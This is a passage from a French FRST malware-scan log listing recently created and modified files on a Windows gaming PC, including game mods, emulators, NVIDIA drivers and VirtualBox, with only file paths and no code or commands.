_____ C:\Users\Shadow\Downloads\MODSKIN_12.1.1.zip 2022-01-07 21:49 - 2022-01-07 21:49 - 000000000 ____D C:\Users\Shadow\Downloads\MODSKIN_12.1.1 2022-01-02 00:31 - 2021-12-31 05:37 - 000000000 ____D C:\Users\Shadow\Desktop\zphisher-master 2022-01-02 00:27 - 2022-01-02 00:27 - 000000000 ____D C:\Users\Shadow\VirtualBox VMs 2022-01-02 00:26 - 2022-01-02 00:30 - 000000000 ____D C:\Users\Shadow\.VirtualBox 2022-01-02 00:26 - 2022-01-02 00:26 - 000000000 ____D C:\ProgramData\VirtualBox 2022-01-02 00:25 - 2022-01-02 00:25 - 000001149 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk 2022-01-02 00:25 - 2022-01-02 00:25 - 000000000 ____D 
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox
2022-01-02 00:25 - 2022-01-02 00:25 - 000000000 ____D C:\Program Files\Oracle
2022-01-02 00:25 - 2021-04-28 14:27 - 000187648 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxUSBMon.sys
2022-01-02 00:25 - 2021-04-28 14:26 - 001038080 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxDrv.sys
2022-01-02 00:24 - 2022-01-02 00:25 - 012390015 _____ C:\Users\Shadow\Downloads\zphisher-master.zip
2022-01-02 00:24 - 2022-01-02 00:24 - 108114104 _____ (Oracle Corporation) C:\Users\Shadow\Downloads\VirtualBox-6.1.22-144080-Win.exe
2021-12-30 23:35 - 2021-12-30 23:35 - 002325915 _____ C:\Users\Shadow\Downloads\MODSKIN_11.24.2 (1).zip
2021-12-30 23:35 - 2021-12-30 23:35 - 000000000 ____D C:\Users\Shadow\Downloads\MODSKIN_11.24.2 (1)
2021-12-30 01:27 - 2021-12-30 01:27 - 000001475 _____ C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\NVIDIA GeForce NOW.lnk
2021-12-30 01:27 - 2021-12-30 01:27 - 000001467 _____ C:\Users\Shadow\Desktop\NVIDIA GeForce NOW.lnk
2021-12-30 01:26 - 2021-12-30 01:26 - 142974048 _____ (NVIDIA Corporation) C:\Users\Shadow\Downloads\GeForceNOW-release.exe
2021-12-29 01:27 - 2021-12-29 01:27 - 000000205 _____ C:\Users\Shadow\Desktop\Tom Clancy's Rainbow Six Siege.url
2021-12-29 01:27 - 2021-12-29 01:27 - 000000205 _____ C:\Users\Shadow\Desktop\Tom Clancy's Rainbow Six Siege - Vulkan.url
2021-12-27 19:58 - 2021-12-27 19:59 - 150068896 _____ C:\Users\Shadow\Downloads\ace3_3.14.1.zip
2021-12-27 19:51 - 2021-12-27 19:51 - 000000000 ____D C:\Users\Shadow\Desktop\backup steam
2021-12-27 19:41 - 2021-12-27 19:41 - 000967553 _____ C:\Users\Shadow\Downloads\DLC unlocker.rar
2021-12-27 02:30 - 2021-12-27 02:30 - 000000000 ____D C:\R6S
2021-12-27 02:20 - 2019-06-20 11:55 - 007694208 _____ C:\Users\Shadow\Desktop\task_force_radio.ts3_plugin
2021-12-27 00:26 - 2021-12-27 00:26 - 000038053 _____ C:\Users\Shadow\Downloads\Arma_3_Preset_XarK_Entrainement_V11.html
2021-12-27 00:14 - 2021-12-27 00:14 - 131443212 _____ C:\Users\Shadow\Downloads\0.9.12.zip
2021-12-25 23:35 - 2021-12-27 03:40 - 000000000 ____D C:\Users\Shadow\Documents\Arma 3 - Other Profiles
2021-12-25 22:10 - 2021-12-25 22:10 - 000000256 _____ C:\Windows\system32\edid.bin
2021-12-25 01:32 - 2021-12-25 01:32 - 000000000 ____D C:\Users\Shadow\Documents\FeedbackHub
2021-12-25 01:32 - 2021-12-25 01:32 - 000000000 ____D C:\Users\Shadow\AppData\Local\ElevatedDiagnostics
2021-12-24 23:29 - 2022-01-07 22:49 - 000000000 ____D C:\Users\Shadow\AppData\Local\Skyrim
2021-12-24 20:54 - 2022-01-08 23:55 - 000000000 ____D C:\Users\Shadow\AppData\Local\Arma 3
2021-12-24 20:54 - 2021-12-24 20:55 - 000000000 ____D C:\Users\Shadow\Documents\Arma 3
2021-12-24 20:54 - 2021-12-24 20:54 - 000000000 ____D C:\ProgramData\Bohemia Interactive
2021-12-24 20:53 - 2022-01-09 01:35 - 000000000 ____D C:\Users\Shadow\AppData\Local\Arma 3 Launcher
2021-12-24 20:41 - 2021-12-24 20:41 - 000000222 _____ C:\Users\Shadow\Desktop\Arma 3.url
2021-12-24 18:32 - 2021-12-24 20:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\vJoy
2021-12-24 18:32 - 2021-12-24 20:36 - 000000000 ____D C:\Program Files\vJoy
2021-12-24 18:32 - 2021-12-24 18:32 - 011482272 _____ (Shaul Eizikovich ) C:\Users\Shadow\Downloads\vJoySetup.exe
2021-12-24 18:32 - 2021-12-24 18:32 - 005484523 _____ C:\Users\Shadow\Downloads\mouse2joystick_custom_CEMU.zip
2021-12-24 18:32 - 2019-07-14 11:06 - 000067448 _____ (Shaul Eizikovich) C:\Windows\system32\Drivers\vjoy.sys
2021-12-24 18:32 - 2019-07-14 11:06 - 000026808 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\Drivers\hidkmdf.sys
2021-12-24 18:29 - 2021-12-24 18:29 - 024871566 _____ C:\Users\Shadow\Downloads\cemu_1.26.0.zip
2021-12-24 18:19 - 2021-12-24 18:19 - 000000000 ____D C:\Users\Shadow\AppData\Local\Cemu
2021-12-24 17:37 - 2021-12-24 18:16 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\USB_HELPER
2021-12-24 17:37 - 2021-12-24 17:37 - 000001087 _____ C:\Users\Shadow\Desktop\Wii U USB Helper.lnk
2021-12-24 17:37 - 2021-12-24 17:37 - 000001073 _____ C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wii U USB Helper.lnk
2021-12-24 17:37 - 2021-12-24 17:37 - 000000000 ____D C:\Users\Shadow\AppData\Local\Hikari06
2021-12-24 17:35 - 2021-12-24 17:37 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\USBHelperLauncher
2021-12-24 17:34 - 2021-12-24 17:34 - 000289190 _____ C:\Users\Shadow\Downloads\USBHelperInstaller.exe
2021-12-24 17:30 - 2021-12-24 17:38 - 940358128 _____ C:\Users\Shadow\Downloads\The.Legend.of.Zelda.Breath.of.the.Wild.v1.5.inclu.DLC.part2.rar
2021-12-24 17:30 - 2021-12-24 17:34 - 1063004405 _____ C:\Users\Shadow\Downloads\The.Legend.of.Zelda.Breath.of.the.Wild.v1.5.inclu.DLC.part1.rar
2021-12-24 17:09 - 2021-12-15 21:58 - 001450200 _____ C:\Windows\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2021-12-24 17:09 - 2021-12-15 21:58 - 001450200 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2021-12-24 17:09 - 2021-12-15 21:57 - 001874648 _____ C:\Windows\system32\vulkaninfo-1-999-0-0-0.exe
2021-12-24 17:09 - 2021-12-15 21:57 - 001874648 _____ C:\Windows\system32\vulkaninfo.exe
2021-12-24 17:09 - 2021-12-15 21:57 - 001466024 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll
2021-12-24 17:09 - 2021-12-15 21:57 - 001209312 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll
2021-12-24 17:09 - 2021-12-15 21:57 - 001112336 _____ C:\Windows\system32\vulkan-1-999-0-0-0.dll
2021-12-24 17:09 - 2021-12-15 21:57 - 000966416 _____ C:\Windows\SysWOW64\vulkan-1-999-0-0-0.dll
2021-12-24 17:09 - 2021-12-15 21:57 - 000966416 _____ C:\Windows\SysWOW64\vulkan-1.dll
2021-12-24 17:09 - 2021-12-15 21:54 - 001524392 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2021-12-24 17:09 - 2021-12-15 21:54 - 000802216 _____ C:\Windows\system32\nvofapi64.dll
2021-12-24 17:09 - 2021-12-15 21:54 - 000679384 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2021-12-24 17:09 - 2021-12-15 21:54 - 000636840 _____ C:\Windows\SysWOW64\nvofapi.dll
2021-12-24 17:09 - 2021-12-15 21:54 - 000565416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2021-12-24 17:09 - 2021-12-15 21:53 - 002116520 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2021-12-24 17:09 - 2021-12-15 21:53 - 001597552 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2021-12-24 17:09 - 2021-12-15 21:53 - 001175512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2021-12-24 17:09 - 2021-12-15 21:53 - 000708776 _____ (NVIDIA Corporation) C:\Windows\system32\nvidia-smi.exe
2021-12-24 17:09 - 2021-12-15 21:52 - 008725160 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2021-12-24 17:09 - 2021-12-15 21:52 - 007843968 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2021-12-24 17:09 - 2021-12-15 21:52 - 005732320 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2021-12-24 17:09 - 2021-12-15 21:52 - 004938880 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2021-12-24 17:09 - 2021-12-15 21:52 - 002852280 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2021-12-24 17:09 - 2021-12-15 21:52 - 000452224 _____ (NVIDIA Corporation) C:\Windows\system32\nvdebugdump.exe
2021-12-24 17:09 - 2021-12-15 21:51 - 000851936 _____ (NVIDIA Corporation) C:\Windows\system32\MCU.exe
2021-12-24 17:09 - 2021-12-15 21:50 - 006438112 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2021-12-24 17:09 - 2021-12-15 13:16 - 000085698 _____ C:\Windows\system32\nvinfo.pb
2021-12-20 21:41 - 2022-01-09 18:23 - 000002319 _____ C:\Users\Shadow\Desktop\R6 Tracker.lnk
2021-12-19 00:40 - 2021-12-25 22:07 - 000000000 ____D C:\Windows\system32\Tasks\NCH Software
2021-12-19 00:40 - 2021-12-19 00:40 - 001473024 _____ (NCH Software) C:\Users\Shadow\Downloads\VoxalModificateurVocal_FR.exe
2021-12-19 00:40 - 2021-12-19 00:40 - 000055976 _____ C:\Windows\system32\Drivers\voxaldriverx64.sys
2021-12-19 00:40 - 2021-12-19 00:40 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\NCH Software
2021-12-18 19:18 - 2021-12-18 19:18 - 000000204 _____ C:\Users\Shadow\Desktop\Rayman Origins.url
2021-12-18 00:36 - 2021-12-18 00:36 - 000000000 ____D C:\Windows\SystemTemp
2021-12-18 00:26 - 2021-12-18 00:26 - 000223744 _____ C:\Windows\SysWOW64\TpmTool.exe
2021-12-18 00:26 - 2021-12-18 00:26 - 000011979 _____ C:\Windows\system32\DrtmAuthTxt.wim
2021-12-18 00:25 - 2021-12-18 00:25 - 000272384 _____ C:\Windows\system32\TpmTool.exe
2021-12-18 00:25 - 2021-12-18 00:25 - 000162816 _____ C:\Windows\system32\DataStoreCacheDumpTool.exe
2021-12-18 00:01 - 2021-12-18 00:01 - 000000000 ___HD C:\$WinREAgent
2021-12-17 00:11 - 2021-12-17 00:11 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Applications Chrome
2021-12-16 22:46 - 2021-12-16 22:46 - 000002186 _____ C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DeepL.lnk
2021-12-16 22:46 - 2021-12-16 22:46 - 000000000 ____D C:\Users\Shadow\AppData\Local\Sentry
2021-12-16 22:46 - 2021-12-16 22:46 - 000000000 ____D C:\Users\Shadow\AppData\Local\DeepL_GmbH
2021-12-16 22:45 - 2021-12-16 22:46 - 000000000 ____D C:\Users\Shadow\AppData\Local\DeepL
2021-12-16 22:45 - 2021-12-16 22:45 - 122954800 _____ (DeepL GmbH) C:\Users\Shadow\Downloads\DeepLSetup.exe
2021-12-15 18:12 - 2021-12-15 18:12 - 000000000 ____D C:\Users\Shadow\Downloads\MODSKIN_11.24.2
2021-12-15 18:11 - 2021-12-15 18:11 - 002325915 _____ C:\Users\Shadow\Downloads\MODSKIN_11.24.2.zip
2021-12-12 01:32 - 2021-12-12 01:36 - 000000000 ____D C:\Users\Shadow\Downloads\Bataille navale
2021-12-12 01:31 - 2021-12-12 01:31 - 000007019 _____ C:\Users\Shadow\Downloads\bataille navale.zip
2021-12-10 16:29 - 2021-12-10 16:29 - 000000000 ____D C:\Users\Shadow\Jedi
2021-12-10 16:29 - 2021-12-10 16:29 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\jupyter
2021-12-10 16:29 - 2021-12-10 16:29 - 000000000 ____D C:\Users\Shadow\AppData\Local\Spyder
2021-12-10 16:29 - 2021-12-10 16:29 - 000000000 ____D C:\Users\Shadow\.matplotlib
2021-12-10 16:29 - 2021-12-10 16:29 - 000000000 ____D C:\Users\Shadow\.ipython
2021-12-10 16:28 - 2021-12-10 16:30 - 000000000 ____D C:\Users\Shadow\.spyder-py3
2021-12-10 16:26 - 2021-12-10 16:26 - 000002414 _____ C:\Users\Shadow\Desktop\Spyder.lnk
2021-12-10 16:23 - 2021-12-10 16:23 - 194199319 _____ C:\Users\Shadow\Downloads\Spyder_64bit_full.exe
2021-12-10 15:07 - 2021-12-10 15:07 - 000000000 ____D C:\Users\Shadow\Downloads\MODSKIN_11.24.1
2021-12-10 15:06 - 2021-12-10 15:07 - 002325703 _____ C:\Users\Shadow\Downloads\MODSKIN_11.24.1.zip

==================== Un mois (modifiés) ==================

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2022-01-09 18:38 - 2021-10-18 20:09 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\discord
2022-01-09 18:37 - 2021-10-18 21:13 - 000000000 ____D C:\Program Files (x86)\Steam
2022-01-09 18:37 - 2021-10-18 19:07 - 000000000 ____D C:\ProgramData\TEMP
2022-01-09 18:33 - 2020-07-28 15:20 - 000003344 _____ C:\Windows\system32\Tasks\Paranoid-SafetyNet
2022-01-09 18:31 - 2021-10-19 11:11 - 000000000 ____D C:\Program Files (x86)\Google
2022-01-09 18:31 - 2019-12-07 10:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-01-09 18:30 - 2020-07-28 11:40 - 000000000 ____D C:\ProgramData\NVIDIA
2022-01-09 18:28 - 2020-07-28 11:57 - 000791762 _____ C:\Windows\system32\perfh00C.dat
2022-01-09 18:28 - 2020-07-28 11:57 - 000149928 _____ C:\Windows\system32\perfc00C.dat
2022-01-09 18:28 - 2020-07-28 11:00 - 001770910 _____ C:\Windows\system32\PerfStringBackup.INI
2022-01-09 18:28 - 2019-12-07 10:13 - 000000000 ____D C:\Windows\INF
2022-01-09 18:24 - 2019-12-07 10:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-01-09 18:24 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\AppReadiness
2022-01-09 18:23 - 2021-12-04 18:01 - 000002319 _____ C:\Users\Shadow\Desktop\U.GG.lnk
2022-01-09 18:23 - 2021-11-07 20:19 - 000000000 ____D C:\Users\Shadow\AppData\Local\Overwolf
2022-01-09 18:23 - 2021-10-28 15:44 - 000000000 _____ C:\.svs_control
2022-01-09 18:23 - 2021-10-19 19:29 - 000000000 ____D C:\Users\Shadow\AppData\Local\Ubisoft Game Launcher
2022-01-09 18:23 - 2021-10-19 07:51 - 000000000 ____D C:\Users\Shadow\AppData\Local\Discord
2022-01-09 18:22 - 2020-07-28 09:55 - 000008192 ___SH C:\DumpStack.log.tmp
2022-01-09 18:22 - 2020-07-28 09:55 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2022-01-09 01:42 - 2019-12-07 10:03 - 000524288 _____ C:\Windows\system32\config\BBI
2022-01-09 01:38 - 2021-10-18 20:03 - 000000000 ____D C:\ProgramData\Riot Games
2022-01-09 01:36 - 2021-10-30 23:27 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\TS3Client
2022-01-08 23:07 - 2021-10-18 20:14 - 000000000 ____D C:\Users\Shadow\AppData\Local\D3DSCache
2022-01-08 19:49 - 2020-07-28 09:55 - 000000000 ____D C:\Windows\system32\SleepStudy
2022-01-08 16:52 - 2021-11-13 02:09 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Vortex
2022-01-08 16:50 - 2021-11-13 02:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Black Tree Gaming Ltd
2022-01-08 16:40 - 2021-11-03 15:12 - 000000000 ____D C:\Users\Shadow\AppData\LocalLow\Temp
2022-01-08 16:39 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\GroupPolicy
2022-01-08 15:38 - 2021-10-19 16:12 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-01-07 23:41 - 2021-11-07 20:20 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Overwolf
2022-01-07 22:44 - 2021-10-18 21:18 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-01-07 22:31 - 2021-11-11 20:09 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Leppsoft
2022-01-07 21:49 - 2021-11-12 01:38 - 000000775 _____ C:\Users\Public\Desktop\LOL SKIN.lnk
2022-01-07 21:49 - 2021-11-06 23:45 - 000000000 ____D C:\Fraps
2022-01-07 17:02 - 2021-10-19 11:12 - 000002245 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-01-07 17:02 - 2021-10-19 11:12 - 000002204 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2022-01-02 00:35 - 2021-11-19 21:59 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Code
2022-01-02 00:33 - 2021-11-19 21:59 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code
2022-01-02 00:27 - 2021-10-18 19:12 - 000000000 ____D C:\Users\Shadow
2021-12-30 01:27 - 2021-10-18 23:48 - 000000000 ____D C:\Users\Shadow\AppData\Local\NVIDIA
2021-12-30 01:27 - 2021-10-18 20:01 - 000000000 ____D C:\Users\Shadow\AppData\Local\NVIDIA Corporation
2021-12-30 01:27 - 2020-07-28 11:40 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2021-12-30 00:36 - 2019-12-07 10:03 - 000000000 ____D C:\Windows\CbsTemp
2021-12-28 05:00 - 2021-10-25 17:13 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\obs-studio
2021-12-28 00:54 - 2021-10-18 21:48 - 000000000 ____D C:\Users\Shadow\AppData\Local\CrashDumps
2021-12-27 17:59 - 2021-10-23 17:49 - 000040960 _____ C:\ShadowProcessator2.sqlite
2021-12-27 02:29 - 2021-10-22 19:30 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
2021-12-26 22:52 - 2021-10-27 18:55 - 000000000 ____D C:\Users\Shadow\AppData\Local\FiveM
2021-12-25 23:00 - 2021-10-20 21:59 - 000000000 ____D C:\Users\Shadow\Documents\My Games
2021-12-25 22:08 - 2021-10-19 21:29 - 000000000 ____D C:\Users\Shadow\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VB Audio
2021-12-25 22:08 - 2021-10-19 21:29 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VB Audio
2021-12-25 22:08 - 2021-10-19 21:29 - 000000000 ____D C:\Program Files\VB
2021-12-25 22:06 - 2021-10-25 17:21 - 000006176 _____ C:\Users\Shadow\AppData\Roaming\VoiceMeeterDefault.xml
2021-12-25 17:34 - 2020-07-28 15:20 - 000000000 ____D C:\Program Files\Blade Group
2021-12-25 17:33 - 2021-11-03 13:13 - 000000019 ____H C:\.svs_fs_delta_00_62fd92f3-b0d8-4d12-b4de-0bdf16e57ad2
2021-12-25 17:33 - 2021-10-18 19:07 - 000000019 ____H C:\.svs_fs_delta_00_aa725710-f0b4-4d97-9b45-4a19aad82f3a
2021-12-25 17:33 - 2021-10-18 19:07 - 000000019 ____H C:\.svs_fs_delta_00_3d16fcca-a48f-497d-82aa-6191ccb35463
2021-12-24 20:53 - 2021-12-01 00:10 - 000000000 ____D C:\Users\Shadow\AppData\Local\Bohemia_Interactive
2021-12-24 20:53 - 2021-10-19 13:09 - 000000000 ____D C:\Users\Shadow\AppData\Local\BattlEye
2021-12-23 01:27 - 2021-10-18 20:00 - 000003976 _____ C:\Windows\system32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-12-23 01:27 - 2021-10-18 20:00 - 000003940 _____ C:\Windows\system32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-12-23 01:27 - 2021-10-18 20:00 - 000001443 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2021-12-23 01:26 - 2021-10-18 20:00 - 000004308 _____ C:\Windows\system32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-12-23 01:26 - 2021-10-18 20:00 - 000003894 _____ C:\Windows\system32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-12-23 01:26 - 2021-10-18 20:00 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport4_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-12-23 01:26 - 2021-10-18 20:00 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-12-23 01:26 - 2021-10-18 20:00 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-12-23 01:26 - 2021-10-18 20:00 - 000003858 _____ C:\Windows\system32\Tasks\NvTmRep_CrashReport1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-12-23 01:26 - 2021-10-18 20:00 - 000003654 _____ C:\Windows\system32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2021-12-23 01:26 - 2020-07-28 11:40 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2021-12-23 01:26 - 2020-07-28 11:39 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2021-12-21 23:14 - 2021-11-07 20:20 - 000000000 ____D C:\Program Files (x86)\Overwolf
2021-12-19 22:43 - 2019-12-07 10:14 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2021-12-18 00:37 - 2020-07-28 09:55 - 000257912 _____ C:\Windows\system32\FNTCACHE.DAT
2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\SystemResources
2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\setup
2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\oobe
2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\lv-LV
2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\lt-LT
2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\et-EE
2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\system32\es-MX
2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\Provisioning
2021-12-18 00:36 - 2019-12-07 10:14 - 000000000 ____D C:\Windows\bcastdvr
2021-12-17 22:33 - 2020-07-28 12:10 - 137938848 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2021-12-17 22:33 - 2020-07-28 12:10 - 000000000 ____D C:\Windows\system32\MRT
2021-12-16 22:46 - 2021-10-18 20:09 - 000000000 ____D C:\Users\Shadow\AppData\Local\SquirrelTemp
2021-12-15 21:57 - 2021-12-03 19:44 - 001112336 _____ C:\Windows\system32\vulkan-1.dll
2021-12-15 21:54 - 2021-10-18 19:09 - 000658344 _____ (NVIDIA Corporation) C:\Windows\system32\nvml.dll
2021-12-15 21:53 - 2021-12-03 19:37 - 000982952 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2021-12-15 21:53 - 2021-12-03 19:37 - 000794024 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2021-12-15 21:50 - 2020-07-28 11:40 - 007586784 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2021-12-15 17:05 - 2020-07-28 09:55 - 000000000 ____D C:\Windows\system32\Drivers\wd
2021-12-11 00:31 - 2021-10-19 16:12 - 000003634 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2021-12-11 00:31 - 2021-10-19 16:12 - 000003510 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2021-12-10 16:24 - 2021-11-19 22:24 - 000000000 ____D C:\Users\Shadow\Desktop\Programmation

==================== Fichiers à la racine de certains dossiers ========

2021-10-18 20:12 - 2021-12-04 17:58 - 000000032 _____ () C:\Users\Shadow\AppData\Roaming\.machineId
2021-10-26 23:45 - 2021-10-27 22:43 - 000012288 _____ () C:\Users\Shadow\AppData\Roaming\emp.bin
2021-12-10 16:28 - 2021-12-10 16:28 - 000000000 _____ () C:\Users\Shadow\AppData\Roaming\Spyder.launch.pyw.log
2021-10-25 17:21 - 2021-12-25 22:06 - 000006176 _____ () C:\Users\Shadow\AppData\Roaming\VoiceMeeterDefault.xml

==================== FLock ==============================

2021-12-25 17:33 C:\.svs_fs_delta_00_3d16fcca-a48f-497d-82aa-6191ccb35463
2021-12-25 17:33 C:\.svs_fs_delta_00_62fd92f3-b0d8-4d12-b4de-0bdf16e57ad2
2021-12-25 17:33 C:\.svs_fs_delta_00_aa725710-f0b4-4d97-9b45-4a19aad82f3a

==================== SigCheck ============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)

==================== Fin de FRST.txt ========================